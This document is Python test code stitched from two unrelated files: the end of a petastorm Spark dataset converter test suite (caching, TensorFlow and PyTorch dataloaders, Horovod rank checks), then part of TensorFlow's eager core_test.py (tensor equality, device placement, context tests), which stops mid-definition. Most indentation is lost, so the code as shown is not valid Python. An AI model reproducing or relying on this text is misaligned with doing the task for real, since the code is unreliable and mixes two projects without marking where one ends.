assert converter1.cache_dir_url != converter13.cache_dir_url
# Test caching for the same dataframe with different parent cache dirs
# that could be normalized to the same parent cache dir
new_temp_url_2 = new_temp_url + os.sep
spark_test_ctx.spark.conf.set(SparkDatasetConverter.PARENT_CACHE_DIR_URL_CONF,
new_temp_url_2)
assert new_temp_url != new_temp_url_2
converter14 = make_spark_converter(df1)
assert converter13.cache_dir_url == converter14.cache_dir_url
finally:
spark_test_ctx.spark.conf.set(SparkDatasetConverter.PARENT_CACHE_DIR_URL_CONF,
ori_temp_url)
def test_df_delete_caching_meta(spark_test_ctx):
from petastorm.spark.spark_dataset_converter import _cache_df_meta_list
df1 = spark_test_ctx.spark.range(10)
df2 = spark_test_ctx.spark.range(20)
converter1 = make_spark_converter(df1)
converter2 = make_spark_converter(df2)
converter1.delete()
cached_list = set(map(lambda x: x.cache_dir_url, _cache_df_meta_list))
assert converter1.cache_dir_url not in cached_list
assert converter2.cache_dir_url in cached_list
    # Recreating converter1 after deletion should work.
make_spark_converter(df1)
def test_check_url():
with pytest.raises(ValueError, match='scheme-less'):
_check_url('/a/b/c')
def test_make_sub_dir_url():
assert _make_sub_dir_url('file:///a/b', 'c') == 'file:///a/b/c'
assert _make_sub_dir_url('hdfs:/a/b', 'c') == 'hdfs:/a/b/c'
assert _make_sub_dir_url('hdfs://nn1:9000/a/b', 'c') == 'hdfs://nn1:9000/a/b/c'
def test_pickling_remotely(spark_test_ctx):
df1 = spark_test_ctx.spark.range(100, 101)
converter1 = make_spark_converter(df1)
@create_tf_graph
def map_fn(_):
with converter1.make_tf_dataset() as dataset:
iterator = dataset.make_one_shot_iterator()
tensor = iterator.get_next()
with tf.Session() as sess:
ts = sess.run(tensor)
return getattr(ts, 'id')[0]
result = spark_test_ctx.spark.sparkContext.parallelize(range(1), 1).map(map_fn).collect()[0]
assert result == 100
@create_tf_graph
def test_tf_dataset_batch_size(spark_test_ctx):
df1 = spark_test_ctx.spark.range(100)
batch_size = 30
converter1 = make_spark_converter(df1)
with converter1.make_tf_dataset(batch_size=batch_size) as dataset:
iterator = dataset.make_one_shot_iterator()
tensor = iterator.get_next()
with tf.Session() as sess:
ts = sess.run(tensor)
assert len(ts.id) == batch_size
@mock.patch('petastorm.spark.spark_dataset_converter.make_batch_reader')
def test_tf_dataset_petastorm_args(mock_make_batch_reader, spark_test_ctx):
df1 = spark_test_ctx.spark.range(100).repartition(4)
conv1 = make_spark_converter(df1)
mock_make_batch_reader.return_value = make_batch_reader(conv1.cache_dir_url)
with conv1.make_tf_dataset(reader_pool_type='dummy', cur_shard=1, shard_count=4):
pass
peta_args = mock_make_batch_reader.call_args.kwargs
assert peta_args['reader_pool_type'] == 'dummy' and \
peta_args['cur_shard'] == 1 and \
peta_args['shard_count'] == 4 and \
peta_args['num_epochs'] is None and \
peta_args['workers_count'] == 4
with conv1.make_tf_dataset(num_epochs=1, workers_count=2):
pass
peta_args = mock_make_batch_reader.call_args.kwargs
assert peta_args['num_epochs'] == 1 and peta_args['workers_count'] == 2
def test_horovod_rank_compatibility(spark_test_ctx):
with mock.patch.dict(os.environ, {'HOROVOD_RANK': '1', 'HOROVOD_SIZE': '3'}, clear=True):
assert (1, 3) == _get_horovod_rank_and_size()
assert _check_rank_and_size_consistent_with_horovod(
petastorm_reader_kwargs={"cur_shard": 1, "shard_count": 3})
assert not _check_rank_and_size_consistent_with_horovod(
petastorm_reader_kwargs={"cur_shard": 1, "shard_count": 2})
assert not _check_rank_and_size_consistent_with_horovod(
petastorm_reader_kwargs={"cur_shard": 0, "shard_count": 3})
with mock.patch.dict(os.environ, {'OMPI_COMM_WORLD_RANK': '1', 'OMPI_COMM_WORLD_SIZE': '3'}, clear=True):
assert (1, 3) == _get_horovod_rank_and_size()
with mock.patch.dict(os.environ, {'PMI_RANK': '1', 'PMI_SIZE': '3'}, clear=True):
assert (1, 3) == _get_horovod_rank_and_size()
with mock.patch.dict(os.environ, {}, clear=True):
assert (None, None) == _get_horovod_rank_and_size()
assert _check_rank_and_size_consistent_with_horovod(
petastorm_reader_kwargs={"cur_shard": 1, "shard_count": 3})
@create_tf_graph
def test_dtype(spark_test_ctx):
df = spark_test_ctx.spark.range(10)
df = df.withColumn("float_col", df.id.cast(FloatType())) \
.withColumn("double_col", df.id.cast(DoubleType()))
converter1 = make_spark_converter(df)
with converter1.make_tf_dataset() as dataset:
iterator = dataset.make_one_shot_iterator()
tensor = iterator.get_next()
with tf.Session() as sess:
ts = sess.run(tensor)
assert np.float32 == ts.double_col.dtype.type
converter2 = make_spark_converter(df, dtype='float64')
with converter2.make_tf_dataset() as dataset:
iterator = dataset.make_one_shot_iterator()
tensor = iterator.get_next()
with tf.Session() as sess:
ts = sess.run(tensor)
assert np.float64 == ts.float_col.dtype.type
converter3 = make_spark_converter(df, dtype=None)
with converter3.make_tf_dataset() as dataset:
iterator = dataset.make_one_shot_iterator()
tensor = iterator.get_next()
with tf.Session() as sess:
ts = sess.run(tensor)
assert np.float32 == ts.float_col.dtype.type
assert np.float64 == ts.double_col.dtype.type
with pytest.raises(ValueError, match="dtype float16 is not supported. \
Use 'float32' or float64"):
make_spark_converter(df, dtype="float16")
@create_tf_graph
def test_array(spark_test_ctx):
df = spark_test_ctx.spark.createDataFrame(
[([1., 2., 3.],),
([4., 5., 6.],)],
StructType([
StructField(name='c1', dataType=ArrayType(DoubleType()))
])
)
converter1 = make_spark_converter(df)
with converter1.make_tf_dataset() as dataset:
iterator = dataset.make_one_shot_iterator()
tensor = iterator.get_next()
with tf.Session() as sess:
ts = sess.run(tensor)
assert np.float32 == ts.c1.dtype.type
@pytest.mark.skipif(
LooseVersion(pyspark.__version__) < LooseVersion("3.0"),
reason="Vector columns are not supported for pyspark {} < 3.0.0"
.format(pyspark.__version__))
@create_tf_graph
def test_vector_to_array(spark_test_ctx):
from pyspark.ml.linalg import Vectors
from pyspark.mllib.linalg import Vectors as OldVectors
df = spark_test_ctx.spark.createDataFrame([
(Vectors.dense(1.0, 2.0, 3.0), OldVectors.dense(10.0, 20.0, 30.0)),
(Vectors.dense(5.0, 6.0, 7.0), OldVectors.dense(50.0, 60.0, 70.0))
], ["vec", "oldVec"])
converter1 = make_spark_converter(df)
with converter1.make_tf_dataset(num_epochs=1) as dataset:
iterator = dataset.make_one_shot_iterator()
tensor = iterator.get_next()
with tf.Session() as sess:
ts = sess.run(tensor)
assert np.float32 == ts.vec.dtype.type
assert np.float32 == ts.oldVec.dtype.type
vec_col = ts.vec[ts.vec[:, 0].argsort()]
old_vec_col = ts.oldVec[ts.oldVec[:, 0].argsort()]
assert (2, 3) == ts.vec.shape
assert (2, 3) == ts.oldVec.shape
assert ([1., 2., 3.] == vec_col[0]).all() and \
([5., 6., 7.] == vec_col[1]).all()
assert ([10., 20., 30.] == old_vec_col[0]).all() and \
([50., 60., 70] == old_vec_col[1]).all()
def test_torch_primitive(spark_test_ctx):
import torch
schema = StructType([
StructField("bool_col", BooleanType(), False),
StructField("float_col", FloatType(), False),
StructField("double_col", DoubleType(), False),
StructField("short_col", ShortType(), False),
StructField("int_col", IntegerType(), False),
StructField("long_col", LongType(), False),
StructField("byte_col", ByteType(), False),
])
df = spark_test_ctx.spark.createDataFrame(
[(True, 0.12, 432.1, 5, 5, 0, -128),
(False, 123.45, 0.987, 9, 908, 765, 127)],
schema=schema).coalesce(1)
    # If we use numPartitions > 1, the order of the loaded dataset would
    # be non-deterministic.
expected_df = df.collect()
converter = make_spark_converter(df)
batch = None
with converter.make_torch_dataloader(num_epochs=1) as dataloader:
for i, batch in enumerate(dataloader):
# default batch_size = 1
for col in df.schema.names:
actual_ele = batch[col][0]
expected_ele = expected_df[i][col]
if col == "float_col" or col == "double_col":
# Note that the default dtype is float32
assert pytest.approx(expected_ele, rel=1e-6) == actual_ele
else:
assert expected_ele == actual_ele
assert len(expected_df) == len(converter)
assert torch.uint8 == batch["bool_col"].dtype
assert torch.int8 == batch["byte_col"].dtype
assert torch.float32 == batch["double_col"].dtype
assert torch.float32 == batch["float_col"].dtype
assert torch.int32 == batch["int_col"].dtype
assert torch.int64 == batch["long_col"].dtype
assert torch.int16 == batch["short_col"].dtype
def test_torch_pickling_remotely(spark_test_ctx):
df1 = spark_test_ctx.spark.range(100, 101)
converter1 = make_spark_converter(df1)
def map_fn(_):
with converter1.make_torch_dataloader(num_epochs=1) as dataloader:
for batch in dataloader:
ret = batch["id"][0]
return ret
result = spark_test_ctx.spark.sparkContext.parallelize(range(1), 1) \
.map(map_fn).collect()[0]
assert result == 100
def test_torch_batch_size(spark_test_ctx):
df = spark_test_ctx.spark.range(8)
conv = make_spark_converter(df)
batch_size = 2
with conv.make_torch_dataloader(batch_size=batch_size,
num_epochs=1) as dataloader:
for batch in dataloader:
assert batch_size == batch['id'].shape[0]
def test_torch_transform_spec(spark_test_ctx):
df = spark_test_ctx.spark.range(8)
conv = make_spark_converter(df)
from torchvision import transforms
from petastorm import TransformSpec
    def _transform_row(df_row):
        scale_transform = transforms.Compose([
            transforms.Lambda(lambda x: x * 0.1),
        ])
        return scale_transform(df_row)
transform = TransformSpec(_transform_row)
with conv.make_torch_dataloader(transform_spec=transform,
num_epochs=1) as dataloader:
for batch in dataloader:
assert min(batch['id']) >= 0 and max(batch['id']) < 1
def test_torch_unexpected_param(spark_test_ctx):
df = spark_test_ctx.spark.range(8)
conv = make_spark_converter(df)
with pytest.raises(TypeError, match="unexpected keyword argument 'xyz'"):
with conv.make_torch_dataloader(xyz=1) as _:
pass
@mock.patch('petastorm.spark.spark_dataset_converter.make_batch_reader')
def test_torch_dataloader_advanced_params(mock_torch_make_batch_reader, spark_test_ctx):
SHARD_COUNT = 3
df = spark_test_ctx.spark.range(100).repartition(SHARD_COUNT)
conv = make_spark_converter(df)
mock_torch_make_batch_reader.return_value = \
make_batch_reader(conv.cache_dir_url)
with conv.make_torch_dataloader(reader_pool_type='dummy', cur_shard=1,
shard_count=SHARD_COUNT) as _:
pass
peta_args = mock_torch_make_batch_reader.call_args.kwargs
assert peta_args['reader_pool_type'] == 'dummy' and \
peta_args['cur_shard'] == 1 and \
peta_args['shard_count'] == SHARD_COUNT and \
peta_args['num_epochs'] is None and \
peta_args['workers_count'] == 4
# Test default value overridden arguments.
with conv.make_torch_dataloader(num_epochs=1, workers_count=2) as _:
pass
peta_args = mock_torch_make_batch_reader.call_args.kwargs
assert peta_args['num_epochs'] == 1 and peta_args['workers_count'] == 2
def test_wait_file_available(spark_test_ctx):
pq_dir = os.path.join(spark_test_ctx.tempdir, 'test_ev')
os.makedirs(pq_dir)
file1_path = os.path.join(pq_dir, 'file1')
file2_path = os.path.join(pq_dir, 'file2')
url1 = 'file://' + file1_path.replace(os.sep, '/')
url2 = 'file://' + file2_path.replace(os.sep, '/')
url_list = [url1, url2]
def create_file(p):
with open(p, 'w'):
pass
    # 1. test that all files exist.
create_file(file1_path)
create_file(file2_path)
_wait_file_available(url_list)
    # 2. test that one file does not exist; expect an error.
os.remove(file2_path)
with pytest.raises(RuntimeError,
match='Timeout while waiting for all parquet-store files to appear at urls'):
_wait_file_available(url_list)
    # 3. test one file becoming available after 1 second.
def delay_create_file2():
time.sleep(1)
create_file(file2_path)
    threading.Thread(target=delay_create_file2).start()
_wait_file_available(url_list)
def test_check_dataset_file_median_size(spark_test_ctx, caplog):
file_size_map = {
'/a/b/01.parquet': 30,
'/a/b/02.parquet': 40,
'/a/b/03.parquet': 50,
'/a/b/04.parquet': 60,
'/a/b/05.parquet': 999000,
}
with mock.patch('os.path.getsize') as mock_path_get_size:
mock_path_get_size.side_effect = lambda p: file_size_map[p]
url_list = ['file://' + path for path in file_size_map.keys()]
caplog.clear()
_check_dataset_file_median_size(url_list)
assert 'The median size' in " ".join(caplog.messages)
for k in file_size_map:
file_size_map[k] *= (1024 * 1024)
caplog.clear()
_check_dataset_file_median_size(url_list)
assert 'The median size' not in " ".join(caplog.messages)
file_size_map = {'/a/b/01.parquet': 29}
url_list = ['file:///a/b/01.parquet']
caplog.clear()
_check_dataset_file_median_size(url_list)
assert 'The median size' not in " ".join(caplog.messages)
@mock.patch.dict(os.environ, {'DATABRICKS_RUNTIME_VERSION': '7.0'}, clear=True)
def test_check_parent_cache_dir_url(spark_test_ctx, caplog):
def log_warning_occur():
return 'you should specify a dbfs fuse path' in '\n'.join([r.message for r in caplog.records])
with mock.patch('petastorm.spark.spark_dataset_converter._is_spark_local_mode') as mock_is_local:
mock_is_local.return_value = False
caplog.clear()
_check_parent_cache_dir_url('file:/dbfs/a/b')
assert not log_warning_occur()
caplog.clear()
_check_parent_cache_dir_url('file:/a/b')
assert log_warning_occur()
mock_is_local.return_value = True
caplog.clear()
_check_parent_cache_dir_url('file:/dbfs/a/b')
assert not log_warning_occur()
caplog.clear()
_check_parent_cache_dir_url('file:/a/b')
assert not log_warning_occur()
def test_get_spark_session_safe_check(spark_test_ctx):
def map_fn(_):
_get_spark_session()
return 0
with pytest.raises(py4j.protocol.Py4JJavaError):
spark_test_ctx.spark.sparkContext.parallelize(range(1), 1).map(map_fn).collect()
|
core_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for core."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import pickle
import threading
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.compat import compat
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import def_function
from tensorflow.python.eager import execute as execute_lib
from tensorflow.python.eager import executor
from tensorflow.python.eager import test
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_resource_variable_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import variables
def execute(op_name, num_outputs, inputs, attrs=None):
return execute_lib.execute(
op_name, num_outputs, inputs, attrs, context.context())
def truncated_normal(shape):
return execute(
b'TruncatedNormal',
1,
inputs=[shape],
attrs=('dtype', dtypes.float32.as_datatype_enum, 'T',
shape.dtype.as_datatype_enum, 'seed', 0, 'seed2', 0))[0]
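# A minimal sketch (values illustrative) of the low-level execute() helper
# above, mirroring testComposition below: an element-wise Add of two int32
# scalars produces a single output, hence the trailing [0].
#
#   s = execute(b'Add', 1,
#               inputs=[constant_op.constant(1), constant_op.constant(2)],
#               attrs=('T', dtypes.int32.as_datatype_enum))[0]
#   assert s.numpy() == 3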
def current_device():
return constant_op.constant(1.).device
def configure_virtual_cpus():
cpus = config.list_physical_devices('CPU')
# Set 2 virtual CPUs
config.set_virtual_device_configuration(cpus[0], [
context.VirtualDeviceConfiguration(),
context.VirtualDeviceConfiguration()
])
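# Note: the two virtual CPUs configured above are what make device strings
# such as 'cpu:1' valid in the placement tests below, e.g.:
#
#   with ops.device('cpu:1'):
#       x = constant_op.constant(1.0)  # placed on the second virtual CPU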
class TFETest(test_util.TensorFlowTestCase):
def setUp(self):
super(TFETest, self).setUp()
configure_virtual_cpus()
def _test_hashable(self, a, b, hashable):
if hashable:
self.assertIsInstance(b, collections.Hashable)
self.assertLen(set([a, b]), 2)
else:
# TODO(gjn): Figure out how to make this work for tf.Tensor
# self.assertNotIsInstance(b, collections.Hashable)
with self.assertRaisesRegexp(TypeError, 'unhashable'):
set([a, b])
def testEquality(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(1.0)
constant_b = constant_op.constant(1.0)
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(1.0)
variable_b = variables.Variable(1.0)
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
# We only test numpy behaviour in v2 mode since we'd like to match that.
numpy_a = np.array(1.0)
numpy_b = np.array(1.0)
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityNan(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertNotEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(float('nan'))
constant_b = constant_op.constant(float('nan'))
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(float('nan'))
variable_b = variables.Variable(float('nan'))
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
numpy_a = np.array(float('nan'))
numpy_b = np.array(float('nan'))
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityCompare(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 2])
tf_b = constant_op.constant([1, 2])
tf_c = constant_op.constant([1, 1])
np_a = np.array([1, 2])
np_b = np.array([1, 2])
np_c = np.array([1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
# We can compare list of tensors
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
self.assertNotEqual([tf_a, tf_b], [tf_b, tf_b])
# We can compare existence in a list
self.assertIn(tf_a, [tf_a, tf_b])
self.assertIn(tf_a, [tf_b, tf_a])
self.assertNotIn(tf_a, [tf_b, tf_c])
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [True, False])
self.assertNotAllEqual(tf_a, tf_c)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [True, False])
self.assertNotAllEqual(np_a, np_c)
      # Even though we technically shouldn't be able to compare here, both TF
      # and numpy handle lists whose elements share the same ids (identical
      # objects) without raising an error.
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
with self.assertRaises(ValueError):
bool([tf_a, tf_b] == [tf_b, tf_b])
self.assertEqual([np_a, np_b], [np_a, np_b])
with self.assertRaises(ValueError):
bool([np_a, np_b] == [np_b, np_b])
# Similar to lists we shouldn't be able to do a `in` check such as
# `if a in [a,b]`. However if `a` is the first element, it works due to
# short circuiting
self.assertIn(tf_a, [tf_a, tf_b])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_a])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_c])
self.assertIn(np_a, [np_a, np_b])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_a])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_c])
# rank 0
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(1), True)
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(2), False)
self.assertAllEqual(np.array(1) == np.array(1), True)
self.assertAllEqual(np.array(1) == np.array(2), False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityBroadcast(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 1])
tf_b = constant_op.constant([1, 1])
tf_c = constant_op.constant([[1, 1], [1, 1]])
tf_d = constant_op.constant([[1, 2], [1, 2]])
tf_e = constant_op.constant([1, 1, 1])
np_a = np.array([1, 1])
np_b = np.array([1, 1])
np_c = np.array([[1, 1], [1, 1]])
np_d = np.array([[1, 2], [1, 2]])
np_e = np.array([1, 1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
self.assertNotEqual(tf_a, tf_d)
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [[True, True], [True, True]])
with self.assertRaises(ValueError):
bool(tf_a == tf_d)
self.assertAllEqual(tf_a == tf_d, [[True, False], [True, False]])
if compat.forward_compatible(2019, 9, 25):
self.assertFalse(bool(tf_a == tf_e))
self.assertTrue(bool(tf_a != tf_e))
self.assertNotAllEqual(tf_a, tf_e)
else:
with self.assertRaises(errors.InvalidArgumentError):
bool(tf_a != tf_e)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [[True, True], [True, True]])
self.assertAllEqual(np_a == np_d, [[True, False], [True, False]])
self.assertFalse(bool(np_a == np_e))
self.assertTrue(bool(np_a != np_e))
self.assertNotAllEqual(np_a, np_e)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testContext(self):
ctx = context.Context()
self.assertTrue(ctx.executing_eagerly())
self.assertEqual('', ctx.scope_name)
ctx.scope_name = 'foo'
self.assertEqual('foo', ctx.scope_name)
self.assertEqual(context.SYNC, ctx.execution_mode)
ctx.execution_mode = context.ASYNC
self.assertEqual(context.ASYNC, ctx.execution_mode)
ctx.execution_mode = context.SYNC
self.assertEqual(context.SYNC, ctx.execution_mode)
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('GPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(None):
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('CPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(ctx.list_logical_devices('CPU')[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
gpus = ctx.list_logical_devices('GPU')
if gpus:
with ctx.device(gpus[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testAsyncBasic(self):
ctx = context.Context(execution_mode=context.ASYNC)
ctx.ensure_initialized()
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testMultiCpuPlacement(self):
with ops.device('cpu:1'):
x = constant_op.constant(1.0)
y = array_ops.identity(x)
self.assertEqual(x.device, '/job:localhost/replica:0/task:0/device:CPU:1')
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
@test_util.run_gpu_only
def testShouldCopy(self):
with ops.device('gpu:0'):
x = constant_op.constant(1.0)
y = array_ops.identity(x)
# The value we're testing y.device against will depend on what the behavior
# of not explicitly specifying a device in the context is. This behavior is
# subject to change (for example, in the future we may want to use GPUs, if
# available, when no device is explicitly provided)
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
def testContextSwitchStackContainsEagerMode(self):
# Eager execution has been enabled, and no other context switch has
# occurred, so `context_switches` should contain exactly one entry.
self.assertEqual(len(context.context().context_switches.stack), 1)
switch = context.context().context_switches.stack[0]
# The entry should log that eager mode was entered.
self.assertIs(switch.enter_context_fn, context.eager_mode)
# It is not possible to build a graph function when eager execution
# is enabled; the stack entry should reflect this fact.
self.assertFalse(switch.is_building_function)
@test_util.run_gpu_only
def testInt32GPU(self):
with ops.device('gpu:0'):
xent = nn_ops.sparse_softmax_cross_entropy_with_logits(
logits=[[0.0, 0.0]], labels=[0])
self.assertAllClose(xent, [0.69314718])
def _runInThread(self, target, args):
t = threading.Thread(target=target, args=args)
try:
t.start()
t.join()
except Exception as e:
raise e
# Test that different thread local values are initialized to the same values
# in different threads.
def testContextThreadLocalMembers(self):
def get_context_values(ctx):
return [
ctx.executing_eagerly(),
ctx.scope_name,
ctx.device_name,
ctx.num_gpus()
]
def get_values(ctx, values):
values.extend(get_context_values(ctx))
context_values = []
ctx = context.Context()
self._runInThread(get_values, (ctx, context_values))
self.assertAllEqual(context_values, get_context_values(ctx))
@test_util.run_gpu_only
def testContextConfig(self):
ctx = context.Context(config=config_pb2.ConfigProto(
device_count={'GPU': 0}))
    self.assertEqual(0, ctx.num_gpus())
def testPickle(self):
tmp_dir = self.get_temp_dir()
fname = os.path.join(tmp_dir, 't.pickle')
with open(fname, 'wb') as f:
t = constant_op.constant(10.0)
pickle.dump(t, f)
with open(fname, 'rb') as f:
t = pickle.load(f)
self.assertAllEqual(t.numpy(), 10.0)
@test_util.run_gpu_only
def testDevicePlacementEnforcesConsistency(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
cpu.__enter__()
self.assertEndsWith(current_device(), 'CPU:0')
gpu.__enter__()
self.assertEndsWith(current_device(), 'GPU:0')
with self.assertRaisesRegexp(
RuntimeError, 'Exiting device scope without proper scope nesting'):
cpu.__exit__()
self.assertEndsWith(current_device(), 'GPU:0')
gpu.__exit__()
self.assertEndsWith(current_device(), 'CPU:0')
@test_util.run_gpu_only
def testReEntrant(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
with cpu:
with gpu:
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'CPU:0')
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
@test_util.run_gpu_only
def testTensorPlacement(self):
x = constant_op.constant(1.).gpu()
with context.device('gpu:0'):
y = constant_op.constant(2.)
    # Add would fail if y were not on the GPU.
result = execute(
b'Add', 1, inputs=[x, y],
attrs=('T', x.dtype.as_datatype_enum))[0].cpu().numpy()
self.assertEqual(3, result)
@test_util.run_gpu_only
def testResourceTensorPlacement(self):
with context.device('gpu:0'):
v = resource_variable_ops.ResourceVariable(1.0)
with context.device('cpu:0'):
      # Check that even though we specified the CPU device, the read op runs
      # on the device where the variable handle lives.
self.assertAllEqual(
gen_resource_variable_ops.read_variable_op(v.handle, v.dtype), 1.0)
@test_util.run_gpu_only
def testCopyBetweenDevices(self):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
@test_util.run_gpu_only
def testCopyBetweenDevicesAsync(self):
with context.execution_mode(context.ASYNC):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
context.context().executor.wait()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
context.context().executor.wait()
context.context().executor.clear_error()
@test_util.run_gpu_only
def testCopyScope(self):
constant = constant_op.constant(1.0)
with ops.device('gpu:0'):
with context.device_policy(context.DEVICE_PLACEMENT_SILENT):
c = constant + 1.0
self.assertAllEqual(c, 2.0)
def testPyFunctionNullContext(self):
def simple_fn(unused_handle):
return 1.
@def_function.function
def test_fn(v):
script_ops.eager_py_func(simple_fn, [v.handle], dtypes.float32)
return 1.
test_var = variables.Variable([2., 3.])
self.assertAllEqual(test_fn(test_var), 1.0)
def testPyFunctionAsync(self):
def simple_fn(v):
one = constant_op.constant(1.)
return v + one
@def_function.function
def test_fn(v):
return script_ops.eager_py_func(simple_fn, [v], dtypes.float32)
async_executor = executor.new_executor(enable_async=True)
with context.executor_scope(async_executor):
test_var = variables.Variable(2.)
self.assertAllEqual(test_fn(test_var), 3.0)
async_executor.wait()
@test_util.run_gpu_only
def testNumpyForceCPU(self):
